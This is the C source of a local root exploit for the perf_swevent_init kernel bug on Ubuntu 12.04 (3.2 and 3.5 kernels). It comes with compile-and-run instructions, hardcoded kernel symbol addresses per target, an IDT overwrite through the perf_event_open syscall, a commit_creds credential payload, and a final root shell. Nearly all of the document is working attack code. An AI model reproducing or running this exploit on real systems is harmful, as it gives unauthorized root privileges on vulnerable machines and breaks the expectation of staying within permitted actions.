/** * Ubuntu 12.04 3.x x86_64 perf_swevent_init Local root exploit * by Vitaly Nikolenko (vnik5287@gmail.com) * * based on semtex.c by sd * * Supported targets: * [0] Ubuntu 12.04.0 - 3.2.0-23-generic * [1] Ubuntu 12.04.1 - 3.2.0-29-generic * [2] Ubuntu 12.04.2 - 3.5.0-23-generic * * $ gcc vnik.c -O2 -o vnik * * $ uname -r * 3.2.0-23-generic * * $ ./vnik 0 */ #define _GNU_SOURCE 1 #include #include #include #include #include #include #include #include #include #define BASE 0x1780000000 #define SIZE 0x0010000000 #define KSIZE 0x2000000 #define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337)))) typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred); uint64_t targets[3][3] = {{0xffffffff81ef67e0, // perf_swevent_enabled 0xffffffff81091630, // commit_creds 0xffffffff810918e0}, // prepare_kernel_cred {0xffffffff81ef67a0, 0xffffffff81091220, 0xffffffff810914d0}, {0xffffffff81ef5940, 0xffffffff8107ee30, 0xffffffff8107f0c0} }; void __attribute__((regparm(3))) payload() { uint32_t *fixptr = (void*)AB(1); // restore the handler *fixptr = -1; commit_creds_fn commit_creds = (commit_creds_fn)AB(2); prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)AB(3); commit_creds(prepare_kernel_cred((uint64_t)NULL)); } void trigger(uint32_t off) { uint64_t buf[10] = { 0x4800000001, off, 0, 0, 0, 0x300 }; int fd = syscall(298, buf, 0, -1, -1, 0); assert( !close(fd) ); } int main(int argc, char **argv) { uint64_t off64, needle, kbase, *p; uint8_t *code; uint32_t int_n, j = 5, target = 1337; int offset = 0; void *map; assert(argc == 2 && "target?"); assert( (target = atoi(argv[1])) < 3 ); struct { uint16_t limit; uint64_t addr; } __attribute__((packed)) idt; // mmap user-space block so we don't page fault // on sw_perf_event_destroy assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE); memset(map, 0, SIZE); asm volatile("sidt %0" : "=m" (idt)); kbase = idt.addr & 0xff000000; printf("IDT addr = 0x%lx\n", idt.addr); assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase); memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &payload, 1024); memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13); // can only play with interrupts 3, 4 and 0x80 for (int_n = 3; int_n <= 0x80; int_n++) { for (off64 = 0x00000000ffffffff; (int)off64 < 0; off64--) { int off32 = off64; if ((targets[target][0] + ((uint64_t)off32)*24) == (idt.addr + int_n*16 + 8)) { offset = off32; goto out; } } if (int_n == 4) { // shit, let's try 0x80 if the kernel is compiled with // CONFIG_IA32_EMULATION int_n = 0x80 - 1; } } out: assert(offset); printf("Using int = %d with offset = %d\n", int_n, offset); for (j = 0; j < 3; j++) { needle = AB(j+1); assert(p = memmem(code, 1024, &needle, 8)); *p = !j ? (idt.addr + int_n * 16 + 8) : targets[target][j]; } trigger(offset); switch (int_n) { case 3: asm volatile("int $0x03"); break; case 4: asm volatile("int $0x04"); break; case 0x80: asm volatile("int $0x80"); } assert(!setuid(0)); return execl("/bin/bash", "-sh", NULL); }